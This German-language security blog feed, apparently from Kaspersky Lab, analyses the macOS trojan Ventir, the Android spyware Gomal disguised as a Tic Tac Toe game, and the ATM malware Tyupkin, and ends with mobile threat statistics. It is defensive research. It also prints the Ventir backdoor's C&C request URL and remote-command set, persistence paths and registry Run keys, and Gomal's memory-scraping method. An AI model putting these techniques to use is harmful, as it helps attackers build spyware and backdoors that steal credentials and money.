Was läuft hier also falsch? Tja, ich würde sagen: alles. Erstens ist es sehr unklug, ein kostenloses öffentliches Gerät für die persönliche und private Kommunikation zu benutzen. Man kann nie wissen, ob es eine Backdoor auf dem Gerät gibt oder wer eigentlich hinter dieser Gastfreundschaft steckt. Zweitens: Wenn eine öffentliche Einrichtung seinen Gästen kostenlos mobile Geräte für die Dauer ihres Aufenthalts zur Verfügung stellen möchte, so ist es wichtig, dass diese zunächst sorgfältig konfiguriert werden, damit sensible Sicherheitspolicies angewandt werden und keine persönlichen Informationen, Passwörter usw. auf dem Gerät gespeichert werden können.

Vielleicht bin ich ja zu misstrauisch, aber wenn ich mich mit einem unbekannten und nicht vertrauenswürdigen Gerät wie einem Tablet in einem Raum befinde, das zudem mit einer Kamera und einem Mikrofon ausgestattet ist, so ziehe ich es vor, es auszuschalten und in einer Schublade zu verstauen. Ich musste das jeden Abend aufs Neue tun, nachdem das Reinigungspersonal es jeden Tag meines Aufenthalts in dem Hotel wieder zurück auf den Schreibtisch gestellt hatte.

Und auch wenn ein solches Gerät anständig konfiguriert ist und private Daten nicht sichtbar speichert, so sollte man immer bedenken, dass der nächste Gast durchaus ein IT-Experte sein könnte, der einfach ein Abbild des gesamten Gerätes erstellen und die eingegebenen privaten Daten dann Schritt für Schritt wiederherstellen könnte.

Folgen Sie mir auf twitter: @dimitribest


Trojaner Ventir: Basteln Sie sich Ihren eigenen MacOS-Spion


  16 Oktober 2014 | 17:47  MSK

Ihr Kommentar  

Vor gar nicht langer Zeit erreichte uns bei Kaspersky Lab eine interessante Datei (MD5 9283c61f8cce4258c8111aaf098d21ee) zur Analyse, die sich als multimodularer Schädling für MacOS X erwies. Bereits nach einer ersten vorläufigen Untersuchung war klar, dass diese Datei nichts Gutes im Schilde führt: Die gewöhnliche ausführbare 64-Bit mach-o-Datei enthielt in einer Datensektion weitere mach-o-Dateien, von denen eine im Autostart platziert worden war, was typisch ist für ein trojanisches Dropper-Programm.

Weiterführende Untersuchungen brachten zutage, dass sich innerhalb des Schädlings eine Backdoor, ein Keylogger sowie ein trojanisches Spionage-Programm verbergen. Besonders bemerkenswert ist, dass der Keylogger eine Kernel-Erweiterung mit offenem Quellcode verwendet, die für jeden Interessierten verfügbar ist, beispielsweise auf GitHub!

Derzeit werden die entdeckten Dateien in Abhängigkeit von ihrer Bestimmung folgendermaßen von den Antiviren-Lösungen von Kaspersky Lab detektiert als: Trojan-Dropper.OSX.Ventir.a, Backdoor.OSX.Ventir.a, Trojan-Spy.OSX.Ventir.a und not-a-virus:Monitor.OSX.LogKext.c.

Quelldatei (Trojan-Dropper.OSX.Ventir.a)

Sofort nach dem Start überprüft der Dropper durch den Aufruf der Funktion geteuid(), ob er über die Rechte eines Superusers (oder auch Root-Rechte) verfügt. Vom Ergebnis dieser Überprüfung hängt es ab, wo die Dateien des Trojaners installiert werden:

  • Verfügt der Schädling über Superuser-Rechte, werden die Dateien in /Library/.local und /Library/LaunchDaemons installiert;
  • Verfügt der Schädling nicht über Root-Rechte, so werden die Dateien an den Orten ~/Library/.local und ~/Library/LaunchAgents installiert (die Tilde “~” kennzeichnet den Pfad zum Heimordner des aktuellen Anwenders).

Alle Dateien des Trojaners, die auf einen infizierten Computer geladen werden, nehmen von vornherein ihren Platz in der Sektion „__data“ der Dropper-Datei ein.

Anordnung der Trojaner-Dateien innerhalb des Droppers

Im Endeffekt werden in einem infizierten System die folgenden Dateien installiert:

  1. Library/.local/updated – startet die Dateien update und EventMonitor erneut, falls sie unerwartet beendet werden sollten.
  2. Library/.local/reweb – dient dem Neustart der Datei updated.
  3. Library/.local/update – Backdoor-Modul.
  4. Library/.local/libweb.db –Datenbankdatei des Schädlings. Enthält von vornherein die globale Konfiguration des Trojaners, beispielsweise die Adresse des C&C.
  5. Library/LaunchAgents (oder LaunchDaemons)/com.updated.launchagent.plist – Eigenschaftsdatei, die zur Installation der Datei Library/.local/updated im Autostart mit Hilfe von Daemon launchd ausgeführt wird.
  6. In Abhängigkeit davon, ob Superuser-Rechte vorhanden sind:

    А) wenn sie vorhanden sind – /Library/.local/kext.tar. Des Weiteren wird das Archiv entpackt:

    • updated.kext – Treiber, der die Tastatureingaben des Nutzers abfängt;
    • Keymap.plist – Karte der Übereinstimmungen der Codes der gedrückten Tasten mit deren Werten;
    • EventMonitor – Agent, der die Tastatureingaben sowie einige Systemereignisse in der Datei Library/.local/.logfile protokolliert.

    B) wenn sie nicht vorhanden sind - ~/Library/.local/EventMonitor. Ein Agent, der den Namen des aktuell aktiven Fensters und die Tastatureingaben in der Datei Library/.local/.logfile protokolliert

Nach Installation der aufgezählten Dateien legt der Trojaner mit Hilfe des Standard-Konsolentools launchctl die Datei updated in den Autostart (Befehl launchctl load %s/com.updated.launchagent.plist).

Für den Fall, dass Superuser-Rechte vorhanden sind, lädt der Dropper daraufhin mit Hilfe des Standardtools OSX kextload den protokollierenden Treiber in den Kernel (Befehl kextload /System/Library/Extensions/updated.kext)

Daraufhin lädt Trojan-Dropper.OSX.Ventir.a die Datei reweb und löscht sich selbst aus dem System.

Die Dateien updated und reweb

Die Datei updated beendet alle Prozess mit dem Namen reweb (Befehl killall -9 reweb). Dann überprüft er in Abständen, ob die Prozesse EventMonitor und update laufen und startet sie, wenn nötig, neu.

Die Datei reweb beendet alle Prozess mit den Namen updated und update, woraufhin sie die Datei Library/.local/updated startet.

Die Datei update (Backdoor.OSX.Ventir.a)

Zu Beginn ihrer Arbeit verteilt die Backdoor die Felderwerte aus der config-Tabelle der Datenbank libweb.db nach lokalen Variablen zur weiteren Verwendung.

Für den Befehlsempfang wird eine HTTP GET-Anfrage der folgenden Art verwendet: http://220.175.13.250:82/macsql.php?mode=getcmd&key=1000&udid=000C29174BA0,

wobei key ein gewisser Schlüssel ist, der in libweb.db in der config-Tabelle gespeichert wird; udid eine МАС-Adresse ist, und 220.175.13.250:82 die IP-Adresse und den Port des C&C-Servers bezeichnen.

Diese Anfrage wird regelmäßig in kurzen Intervallen in einer Endlosschleife gesendet.

Die Backdoor kann die folgenden Befehle vom C&C ausführen:

  • reboot – Neustart des Computers;
  • restart – Neustart der Backdoor durch das Starten der Datei reweb;
  • uninstall – vollständiges Löschen der Backdoor aus dem System.
  • show config – Senden der Daten aus der config-Tabelle an den C&C-Server;
  • down exec – Aktualisierung der Datei update, Update-Download vom C&C-Server;
  • down config – Aktualisierung der Konfigurationsdatei libweb.db, Download des Updates vom C&C-Server;
  • upload config – Senden der Datei libweb.db an den C&C-Server;
  • update config:[Parameter] – Update der config-Datei in der Datenbankdatei libweb.db, in den Parametern werden die Felderwerte der Tabelle übermittelt;
  • executeCMD:[Parameter] – Ausführung des Befehls, der im Parameter über die Funktion popen(cmd, “r”) angegeben wird, Senden der Ausgabe des Befehls an den C&C-Server;
  • executeSYS:[Parameter] – Ausführung des Befehls, der im Parameter über die Funktion system(cmd) angegeben wird;
  • executePATH:[Parameter] – Start einer Datei aus dem Verzeichnis Library/.local/, der Dateiname wird im Parameter angegeben;
  • uploadfrompath:[Parameter] – Upload der Datei mit dem im Parameter vermerkten Namen aus dem Verzeichnis Library/.local/ auf den C&C-Server;
  • downfile:[Parameter] – Download der Datei mit dem im Parameter angegebene Namen vom C&C-Server und Speichern der Datei gemäß dem im Parameter angegebenen Pfad.

Teil des Befehls, der vom Backdoor-Modul verarbeitet wird

Datei EventMonitor (Trojan-Spy.OSX.Ventir.a)

Diese Datei wird ins System geladen, wenn es dem Dropper nicht gelingt, Superuser-Rechte zu erhalten. Nach dem Start installiert Trojan-Spy.OSX.Ventir.a mit Hilfe der API-Funktionen des Carbon Event Managers seine Systemereignis-Routine. In der neuen Routine erfolgt das Abfangen von Ereignissen, die mit dem Betätigen von Tasten zusammenhängen sowie deren Protokollierung in der Datei ~/Library/.local/.logfile. Hilfstasten (wie etwa shift) erscheinen im Protokoll in der folgenden Form: [command],  [option],  [ctrl], [fn], [ESC], [tab], [backspace] usw.

Verarbeitung von Tastatur-Ereignissen

Ebenfalls direkt vor der Verarbeitung der Tastenbetätigungen erfolgt die Bestimmung des Namens des Prozesses, dessen Fenster aktuell aktiv ist. Zu diesem Zweck werden die Funktionen GetFrontProcess und CopyProcessName aus der Carbon-API verwendet. Der Name des Prozesses wird ebenfalls ins Protokoll aufgenommen in Form von [Application {Name_Prozess} is the frontwindow]. Diesem Umstand ist es zu verdanken, dass der Trojaner bestimmen kann, in welche Anwendung die protokollierte Phrase eingebettet wurde.

Datei kext.tar (not-a-virus:Monitor.OSX.LogKext.c)

Wie bereits oben erwähnt, wird das Archiv kext.tar auf den infizierten Computer geladen, wenn es dem Trojaner Trojan-Dropper.OSX.Ventir gelungen ist, Root-Rechte zu erhalten. In dem Archiv befinden sich drei Dateien:

  • updated.kext
  • EventMonitor
  • Keymap.plist

Das Programmpaket updated.kext ist eine Kernel-Erweiterung (kext) mit offenem Quellcode, die für das Abfangen von Tastaturbetätigungen vorgesehen ist. Diese Erweiterung wird von uns schon seit Langem als not-a-virus:Monitor.OSX.LogKext.c detektiert, und ihr Quellcode (wie ebenfalls bereits erwähnt) ist zum gegenwärtigen Zeitpunkt für jeden Interessierten verfügbar.

Die Datei Keymap.plist ist eine Karte der Übereinstimmung des Codes gedrückter Tasten mit ihren Werten. Die Datei EventMonitor verwendet sie zur Bestimmung der Tastaturwerte nach den entsprechenden Codes, die ihr mit der Datei updated.kext übermittelt werden.

Die Datei EventMonitor ist ein Dateiagent, der Daten von der Kernel-Erweiterung updated.kext entgegennimmt, sie verarbeitet und in die Log-Datei /Library/.local/.logfile schreibt. Hier als Beispiel ein Teil eines solchen Protokolls, das die vom Trojaner abgefangenen Anmeldedaten inklusive Passwort enthält:

Wie man auf dem Screenshot sieht, landen Benutzername und Kennwort des E-Mail-Accounts umgehend im Log, sobald das Opfer die Seite yandex.ru im Browser aufgerufen und die entsprechenden Daten dort eingegeben hat – und von dort wandern sie direkt in die Hände der Cyberkriminellen.

Diese Bedrohung ist gerade vor dem Hintergrund des noch nicht lange zurückliegenden Vorfalls besonders aktuell, bei dem es zum Verlust von Anmeldeinformationen und Passwörtern für Accounts bei Yandex.ru, Mail.ru und Gmail kam. Es ist nicht ausgeschlossen, dass am Auffüllen dieser Datenbanken auch Schädlinge der Familie Ventir beteiligt waren.

Zum Abschluss sei erwähnt, dass der Trojaner Trojan-Dropper.OSX.Ventir.a mit seiner multimodularen Struktur an den berüchtigten Trojan.OSX.Morcut (alias OSX/Crisis) erinnert, der in etwa dieselbe Anzahl an Modulen mit ähnlicher Bestimmung enthielt. Die Verwendung von Software mit offenem Quellcode erleichtert Cyberkriminellen die Konstruktion neuer Schädlinge erheblich. Daher ist davon auszugehen, dass die Zahl trojanischer Spionage-Programme künftig weiter steigen wird.

„Tic Tac Toe“ mit Überraschung


  10 Oktober 2014 | 13:00  MSK

Ihr Kommentar  

Die Versuche Cyberkrimineller, Schadprogramme als nützliche Anwendungen zu tarnen, sind so häufig geworden, dass sie schon zum Alltag gehören. Doch die Entwickler des neuen mobilen Trojaners Gomal zeigten sich nicht nur bei der Tarnung kreativ, indem sie ihrem Machwerk das Spiel „Tic Tac Toe“ hinzufügten, sondern sie statteten den Schädling auch mit interessanten und für diese Art von Software neuen Techniken aus.

Alles begann damit, dass uns das Spiel Tic Tac Toe zur Analyse überlassen wurde. Auf den ersten Blick machte die Anwendung einen völlig ungefährlichen Eindruck:

Tic Tac Toe mit Überraschung

Die Liste der von dem Spiel angefragten Ermächtigungen ließ uns allerdings stutzig werden. Wozu braucht die Anwendung Zugriff auf das Internet, auf die Kontakte des Anwenders und das SMS-Archiv, wozu die Möglichkeit, Anrufe und Audioaufzeichnungen zu verarbeiten? Wir haben Untersuchungen angestellt und herausgefunden, dass es sich bei diesem „Spiel“ in Wahrheit um eine multifunktionale Spionage-Software handelt. Zum gegenwärtigen Zeitpunkt wird diese Malware von den Kaspersky Lab-Produkten als Trojan-Spy.AndroidOS.Gomal.a detektiert.

Eine sorgfältige Untersuchung des Schädlings hat gezeigt, dass der Code des Spiels selbst weniger als 30% der hauptsächlichen ausführbaren Datei ausmacht. Der Rest ist der Funktionalität zur Bespitzelung des Anwenders und zum Diebstahl persönlicher Informationen vorbehalten.

Tic Tac Toe mit Überraschung

Grün eingefasst der Code des Spiels, mit roter Umrandung – der schädliche Teil des Programms

Was genau zählt nun zu dieser Funktionalität? In erster Linie enthält der Schädling die für mobile Schädlinge schon zum Standardprogramm gehörenden Funktionen ‚Audioaufzeichnung‘

Tic Tac Toe mit Überraschung

und SMS-Diebstahl.

Tic Tac Toe mit Überraschung

Zudem sammelt der Trojaner Informationen über das Gerät und sendet alle ergatterten Daten an den Server seiner Betreiber. Allerdings hat Trojan-Spy.AndroidOS.Gomal.a auch etwas Außergewöhnliches an sich – zusammen mit dem Trojaner wird auch ein ganzes Paket von interessanten Bibliotheken mitgeliefert.

Tic Tac Toe mit Überraschung

Bei einem Teil dieses Paketes handelt es sich um ein Exploit, das unerlässlich zum Erhalt von Root-Rechten auf einem Android-Gerät ist. Mit den erweiterten Privilegien hat die Anwendung Zugriff auf verschiedene Dienste des Betriebssystems Linux (auf dem Android basiert), insbesondere auf das Lesen des Speichers eines Prozesses und /maps.

Nach Erhalt der Root-Rechte macht sich der Trojaner an die Arbeit. So stiehlt er beispielsweise die Mail-Korrespondenz der Anwendung Good for Enterprise, wenn diese auf dem Smartphone installiert ist. Diese App wird als sicherer E-Mail-Client für Unternehmen positioniert, daher könnte der Datendiebstahl aus diesem Programm ernsthafte Probleme für das Unternehmen nach sich ziehen, in dem der angegriffene Mitarbeiter tätig ist. Für die Attacken auf Good for Enterprise empfängt der Trojaner mit Hilfe der Konsole (Befehl ps) die ID des interessierenden Prozesses und liest die virtuelle Datei /proc/<pid>/maps. Diese Datei enthält Informationen über die der Anwendung bereitgestellten Speicherblöcke.

Tic Tac Toe mit Überraschung

Nach Erhalt der Liste von Blöcken findet der Schädling den Block [heap], der die Zeilendaten der Anwendung enthält und erstellt eine Kopie des Speicherinhalts mit Hilfe einer weiteren Bibliothek aus seinem Paket. Daraufhin wird in dem nun erhaltenen Speicherauszug eine Suche nach für E-Mails typischen Signaturen durchgeführt, und die auf diese Weise gefundenen Mails werden an den Server der Cyberkriminellen weitergeleitet.

Darüber hinaus stiehlt Gomal Informationen aus Logcat – einem in Android integrierten Protokollierungsdienst, der für das Debugging von Anwendungen verwendet wird. Sehr häufig hinterlassen Entwickler auch nach der Veröffentlichung ihrer App kritisch wichtige Informationen in Logcat. Dank dieser Tatsache sind Cyberkriminelle in der Lage, noch mehr vertrauliche Informationen aus anderen Programmen zu stehlen.

Unter dem Strich eröffnet das auf den ersten Blick harmlose „Tic Tac Toe“ Verbrechern den Zugriff auf eine enorme Menge persönlicher Daten des Anwenders, sowie auf die Daten des Unternehmens, in dem er arbeitet. Die von Gomal angewandte Technik trat erstmals in Windows-Trojanern in Erscheinung, doch wie wir sehen, wird sie nun auch in Android-Schädlingen eingesetzt. Das Gefährlichste dabei ist jedoch, dass unter Anwendung derselben Prinzipien nicht nur Informationen aus Good for Enterprise gestohlen werden können: Es ist nicht ausgeschlossen, dass schon bald eine ganze Reihe von mobilen Schädlingen auf den Plan tritt, die weit verbreitete E-Mail-Clients, Messenger und andere Programme angreifen.

Ergänzung:

Trojan-Spy.AndroidOS.Gomal.a verwendet eine alte Version des Exploits, die auf Samsung-Geräten mit Betriebssystemen der Versionen 4.0.4 und niedriger funktioniert. Daher ist auf Geräten mit neuer Firmware eine Attacke eben dieser Version des Schädlings auf den E-Mail-Client des Unternehmens nicht erfolgreich.

Wir haben bisher noch keine Versuche registriert, unsere Anwender mit dem Trojaner Gomal zu infizieren. Doch obgleich dieses Sample bisher nicht in freier Wildbahn verbreitet ist, detektieren wir es, um künftig effektiv Angriffe mobiler Schädlinge abwehren zu können, die unter Umständen auf der Grundlage dieses Konzepts entwickelt wurden.

Tyupkin: Manipulation von Geldautomaten durch Malware


  Global Research and Analysis Team of Kaspersky Lab        7 Oktober 2014 | 10:48  MSK

Ihr Kommentar  

Früher in diesem Jahr führte Kasperskys Global Research and Analysis Team, GReAT, auf Anfrage einer Finanzinstitution, forensische Ermittlungen einer cyberkriminellen Attacke auf zahlreiche Geldautomaten in Osteuropa durch.

Im Zuge dieser Ermittlungen entdeckten wir ein Schadprogramm, dass es Angreifern ermöglicht, die Geldkassetten von Bankomaten durch direkte Manipulation zu leeren.

Zum Zeitpunkt der Ermittlungen war die Malware auf mehr als 50 Geldautomaten in osteuropäischen Banken aktiv. Ausgehend von von VirusTotal vorgelegten Daten glauben wir, dass das Schadprogramm sich in einige andere Länder ausgebreitet hat, die USA, Indien und China eingeschlossen.

Aufgrund der Natur der Geräte, auf denen die Malware läuft, verfügen wir nicht über KSN-Daten, um das Ausmaß der Infektion zu bestimmen. Doch auf der Grundlage einer von VirusTotal erstellten Statistik, erkennen wir ein Vorkommen dieses Schadprogramms in den folgenden Ländern:

Tyupkin: Manipulation von Geldautomaten durch Malware

Tyupkin: Manipulation von Geldautomaten durch Malware

Diese neue Malware, die von Kaspersky Lab als Backdoor.MSIL.Tyupkin detektiert wird, betrifft Geldautomaten von einem großen Bankomaten-Hersteller, auf denen Microsoft Windows 32 läuft.

Die Malware setzt verschiedene raffinierte Techniken ein, um eine Detektion zu vermeiden. Erstens ist sie nur in bestimmten Nachtstunden aktiv. Sie verwendet dabei einen zufällig generierten Schlüssel für jede Sitzung. Ohne diesen Schlüssel kann niemand mit dem infizierten Geldautomaten interagieren.

Wird der Schlüssel korrekt eingegeben, zeigt das Schadprogramm Informationen über den in jeder Kassette verfügbaren Geldbetrag an und ermöglicht einem Angreifer, ohne physischen Zugriff auf den Geldautomaten 40 Banknoten aus der ausgewählten Kassette zu entnehmen.

Die meisten der analysierten Samples wurden um den März 2014 herum kompiliert. Doch mit der Zeit hat sich diese Malware weiterentwickelt. In ihrer letzten Variante (Version .d) verfügt die Schadsoftware über Anti-Debug- und Anti-Emulationstechniken und deaktiviert zudem McAfee Solidcore auf einem infizierten System.

Analyse

Dem Bildmaterial der Überwachungskameras an den Standorten der infizierten Geldautomaten zufolge können die Angreifer das Gerät über eine bootbare CD manipulieren und die Malware installieren.

Die Angreifer kopieren die folgenden Dateien in den Geldautomaten:

C:\Windows\system32\ulssm.exe
%ALLUSERSPROFILE%\Start Menu\Programs\Startup\AptraDebug.lnk

Nach mehreren Umgebungs-Checks entfernt das Schadprogramm die .lnk-Datei und erstellt einen Schlüssel in der Registry:

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
“AptraDebug” = “C:\Windows\system32\ulssm.exe”

Die Malware ist dann in der Lage, mit Geldautomaten über die Standardbibliothek MSXFS.dll zu interagieren – Erweiterung für Finanzdienste (XFS).

Die Schadsoftware läuft in einer Endlosschleife und wartet auf Input des Nutzers. Um die Erkennung zu erschweren, nimmt Tyupkin (in der Standardeinstellung) nur sonntags und montags in der Nacht Befehle entgegen.

Die Malware akzeptiert die folgenden Befehle:

  • XXXXXX – Zeigt das Hauptfenster.
  • XXXXXX – Löscht sich selbst mit einer Batch-Datei.
  • XXXXXX – Verlängert die Zeitspanne der Malware-Aktivität.
  • XXXXXX – Verbirgt das Hauptfenster.

Nach jedem Befehl muss der Betreiber “Enter” auf dem Eingabefeld des Geldautomaten drücken.

Tyupkin verwendet Sitzungsschlüssel auch, um Interaktion mit zufälligen Nutzern zu verhindern. Nach Eingabe des Befehls zur Anzeige des Hauptfensters zeigt die Schadsoftware die Aufforderung “ENTER SESSION KEY TO PROCEED!”- „Geben Sie den Session-Schlüssel ein, um fortzufahren!“- an, wobei für jede Sitzung ein Seed Key verwendet wird.

Der Angreifer muss den Algorithmus kennen, um einen auf dem gezeigten Seed Key basierenden Sitzungsschlüssel generieren zu können. Nur wenn dieser Schlüssel korrekt eingegeben wird, ist es möglich, mit einem infizierten Geldautomaten zu interagieren.

Daraufhin zeigt die Malware die folgende Mitteilung an:

CASH OPERATION PERMITTED.
TO START DISPENSE OPERATION -
ENTER CASSETTE NUMBER AND PRESS ENTER.
(BAR-VORGANG ERLAUBT. UM DEN AUSGABEVORGANG ZU STARTEN, GEBEN SIE DIE KASSETTENNUMMER EIN UND DRÜCKEN SIE ENTER).

Wird nun eine Kassettennummer eingegeben, gibt der Geldautomat 40 Banknoten aus dieser Kassette aus.

Tyupkin: Manipulation von Geldautomaten durch Malware

Wird der Sitzungsschlüssel falsch eingegeben, deaktiviert das Schadprogramm das lokale Netzwerk und zeigt die folgende Nachricht an:

DISABLING LOCAL AREA NETWORK...
PLEASE WAIT...
(LOKALES NETZWERK WIRD DEAKTIVIERT…
BITTE WARTEN…)

Es ist nicht klar, warum die Malware das LAN deaktiviert. Vermutlich geschieht das, um entfernte Untersuchungen zu verhindern oder zu unterbrechen.

Ein Video mit einer Demonstration an einem echten Geldautomaten ist unter dem folgenden Link verfügbar: http://youtu.be/QZvdPM_h2o8

Fazit

In den letzten Jahren beobachten wir eine deutliche Zunahme von Angriffen auf Geldautomaten unter Verwendung von Skimming-Geräten und Schadsoftware. Nach umfassenden Berichten über Fälle, bei denen Finanzdaten von Banken auf der ganzen Welt abgegriffen wurden, kam es zu einem energischen Durchgreifen der Strafverfolgungsbehörden rund um den Globus, das zu Verhaftungen und Verurteilungen von Cyberkriminellen führte.

Die erfolgreiche Verwendung von Skimming-Geräten zum heimlichen Auslesen und Kopieren von Kredit- und Bankkarten, wenn die Kunden ihre Karten in Geldautomaten bei Banken oder Tankstellen stecken, ist hinreichend bekannt. Dieses Problem ist mittlerweile stärker in das öffentliche Bewusstsein gerückt, so dass die Bankkunden nun auf der Hut sind und Vorsichtsmaßnahmen ergreifen, wenn sie öffentliche Bankomaten benutzen.

Nun werden wir Zeuge der natürlichen Evolution dieser Bedrohung, wobei die Cyberkriminellen in der Nahrungskette aufsteigen und nun die Finanzinstitutionen direkt angreifen. Das geschieht über die unmittelbare Infektion der Geldautomaten selbst oder durch direkte APT-artige Angriffe auf die Bank. Die Tyupkin-Malware ist ein Beispiel dafür, dass die Angreifer eine Stufe aufgestiegen sind und Schwachstellen in der Infrastruktur von Geldautomaten finden.

Die Tatsache, dass auf vielen Bankomaten Betriebssysteme mit bekannten Sicherheitslücken laufen, sowie fehlende Schutzlösungen sind weitere Probleme, die dringend behandelt werden müssen.

Wir empfehlen den Banken, die physische Sicherheit ihrer Geldautomaten zu überprüfen und über eine Investition in hochwertige Sicherheitslösungen nachzudenken.

Empfehlungen

Wir empfehlen Finanzinstitutionen und Organisationen, die Geldautomaten vor Ort betreiben, die folgenden Richtlinien zu beachten:

  • Überprüfen Sie die physische Sicherheit Ihrer Geldautomaten und denken Sie über eine Investition in hochwertige Sicherheitslösungen nach.
  • Ändern Sie die Standard Upper Pool Lock und die Standard-Schlüssel in allen Geldautomaten. Vermeiden Sie die Verwendung von Master-Keys vom Hersteller.
  • Installieren Sie Alarmanlagen an den Geldautomaten und stellen Sie sicher, dass sie auch funktionieren. Beobachtungen zufolge infizierten die Cyberkriminellen hinter Tyupkin nur Geldautomaten ohne Alarmanlagen.
  • Um zu erfahren, wie Sie in einem Schritt herausfinden können, ob Ihre Automaten infiziert sind, nehmen Sie über die folgende Adresse Kontakt mit uns auf: intelreports@kaspersky.com. Um die Geldautomaten-Systeme komplett zu scannen und die Backdoor zu löschen, verwenden Sie bitte das kostenlose Virus Removal Tool von Kaspersky Lab (zum Download geht es hier).

Allgemeine Ratschläge für Betreiber von Geldautomaten außer Haus

  • Stellen Sie sicher, dass der Geldautomat in einer offenen, gut beleuchteten Umgebung steht, die von sichtbaren Überwachungskameras beobachtet wird. Der Bankomat sollte sicher auf dem Boden mit einem Anti-Lasso-Gerät befestigt sein, das Verbrecher abschreckt.
  • Überprüfen Sie die die Bankomaten regelmäßig auf Anzeichen, die auf das Anbringen von Dritt-Geräten (Skimmer) hinweisen.
  • SeienSie auf der Hut vor Social Engineering-Attacken von Kriminellen, die sich als Sicherheitsinspektoren für die Alarmanlagen, Überwachungsanlagen oder andere Geräte vor Ort ausgeben.
  • Nehmen Sie Eindringungsalarme ernst und verhalten Sie sich dementsprechend, indem Sie die zuständigen Strafverfolgungsbehörden über jedes potentielle Leck informieren.
  • Ziehen Sie in Betracht, den Geldautomaten mit gerade ausreichend Geld für den Betrieb für einen Tag auszustatten.
  • Mehr Empfehlungen - sowohl für Händler als auch für Nutzer - finden Sie unter  http://www.link.co.uk/AboutLINK/site-owners/Pages/Security-for-ATMs.aspx

KSN-Report zu mobilen Cyberbedrohungen: Android-paranoid


   6 Oktober 2014 | 15:00  MSK

Ihr Kommentar  

Smartphones und Tablets haben sich schon lange als beliebte persönliche Geräte etabliert. Eine im Frühjahr 2014 durchgeführte gemeinsame Studie von Kaspersky Lab und B2B International hat gezeigt, dass 77% der befragten Internetnutzer mehrere Geräte zum Surfen im World Wide Web benutzen – neben den traditionellen Computern sind das insbesondere Smartphones und Tablets. Laut IDC wurden im zweiten Quartal 2014 insgesamt 85% des Marktes für mobile Geräte von Android eingenommen. Diese Zahlen sind eine Bestätigung der unangefochtenen Führungsrolle Androids unter den mobilen Umgebungen.

Das bedeutet auch, dass Geräte unter Android unweigerlich die Aufmerksamkeit von Cyberkriminellen auf sich ziehen, die Malware entwickeln und in Umlauf bringen. Wir schätzen, dass 98,05% aller existierenden mobilen Schadprogramme die Nutzer von Android-Geräten angreift. Aber wie viel genau sind “alle existierenden Schadprogramme“? Unsere Daten zeigen, dass allein in der ersten Hälfte des laufenden Jahres 175.442 neue individuelle Schadprogramme für Android detektiert wurden. Das sind 18,3% (oder 32.231 Schadprogramme) mehr als in dem gesamten Jahr 2013. Aus diesem und anderen Gründen kann man mit Fug und Recht behaupten, dass die erdrückende Mehrheit mobiler Cyberbedrohungen sich gegen Android richtet.

Um einschätzen zu können, wie groß diese Bedrohung ist, haben wir unseren Kaspersky Security Network Report zu mobilen Cyberbedrohungen erstellt. Erstmals arbeiteten wir dabei mit einem externen Partner zusammen, um unsere Studie zu vervollständigen. Unsere Kollegen von INTERPOL teilten dabei ihre Fachmeinung darüber mit uns, wie sich die Cyberkriminalität entwickelt hat, sowie einige Informationen darüber, welche Art mobiler Bedrohungen sie in letzter Zeit ermittelt haben.

Diese Studie bezieht sich auf den 12monatigen Zeitraum vom 1. August 2013 bis zum 31 Juli 2014. Der Untersuchungszeitraum wurde auf der Grundlage von Kaspersky Lab-Daten ausgewählt. Kaspersky Lab begann im Mai 2012 statistische Daten über Angriffe gegen Android-User zusammenzutragen. Im Laufe der folgenden zwei Jahre wurde beobachtet, dass die Zahl der Android-Bedrohungen, die Zahl der Angriffe und die Zahl der angegriffenen User gerade innerhalb des oben erwähnten Zeitraums besonders stark gestiegen sind.

Detektionen der Kaspersky Lab-Sicherheitsprodukte von  Cyberattacken auf Android-Geräte im Laufe der gesamten Beobachtungsgeschichte


Detektionen der Kaspersky Lab-Sicherheitsprodukte von Cyberattacken auf Android-Geräte im Laufe der gesamten Beobachtungsgeschichte.

Die Quelle der in der vorliegenden Studie verwendeten Daten ist der Cloud-Service Kaspersky Security Network (KSN), an dem mehr als 5.000.000 Nutzer von Android-basierten Smartphones und Tablets teilnehmen, die von Kaspersky Lab-Produkten geschützt werden. Im Rahmen dieser Studie wurden die von diesen Geräten gesammelten Daten analysiert.

Die wichtigsten Studienergebnisse in der Zusammenfassung:


  • Innerhalb von 12 Monaten meldeten die Sicherheitsprodukte von Kaspersky Lab 3.408.112 Malware-Detektionen auf den Geräten von 1.023.202 Nutzern.

  • Innerhalb von 10 Monaten, von August 2013 bis März 2014, hat sich die Zahl der Attacken pro Monat fast verzehnfacht, von 6.000 im August 2013 auf 644.000 im März 2014.

  • Die Zahl der angegriffenen Nutzer ist ebenfalls drastisch gestiegen, von 35.000 im August 2013 auf 242.000 im März 2014.

  • 59.06% der Malware-Detektionen sind Programmen zuzuordnen, die in der Lage sind, den Anwendern Geld zu stehlen

  • Ungefähr 500.000 Nutzer waren mit mobiler Malware konfrontiert, die mindestens auf den Diebstahl von Geld spezialisiert ist.

  • In Russland, Indien, Kasachstan, Vietnam, der Ukraine und Deutschland wurden die meisten Angriffe registriert.

  • Die auf den Versand von SMS spezialisierten Trojaner waren die am weitesten verbreiteten Schadprogramme im Untersuchungszeitraum. Auf sie entfielen 57,08% aller Detektionen.

  • Die Zahl der Modifikationen mobiler Bank-Trojaner ist innerhalb von 12 Monaten um mehr als das 14-Fache gestiegen – von einigen hundert auf mehr als 5000.

In der Studie wurde zudem das Benehmen einiger weit verbreiteten Typen von Android-Schädlingen genauer unter die Lupe genommen. Insbesondere haben wir die Entwicklung von Attacken unter Verwendung von SMS und Bank-Trojanern sowie Spyware näher verfolgt. Ein weiteres Thema der Untersuchung sind die so genannten Affiliate Programme, oder auch Partner-Programme. Dabei handelt es sich um spezielle webbasierte Geschäftsmodelle, die vielfältige Betrugsarten ermöglichen, mittels derer Geld durch die Verbreitung von Schadprogrammen und die Infektion von Anwendergeräten verdient werden kann. Diese Programme senden SMS an Premium-Kurznummern, die das mobile Prepaid-Konto des Opfers leeren.

Während des Untersuchungszeitraums beobachteten wir mindestens vier große aktive Affiliate Programme, die für etwa ein Viertel aller Angriffe in dem entsprechenden Zeitraum verantwortlich waren. Alle diese Affiliate Programme waren vornehmlich in Russland und Ländern der ehemaligen Sowjetunion aktiv, aber jedes von ihnen verwendete eine andere Familie von SMS-Trojanern. Weitere vier Programme, die wir beobachteten, richteten sich in erster Linie gegen Nutzer aus Europa und Asien.

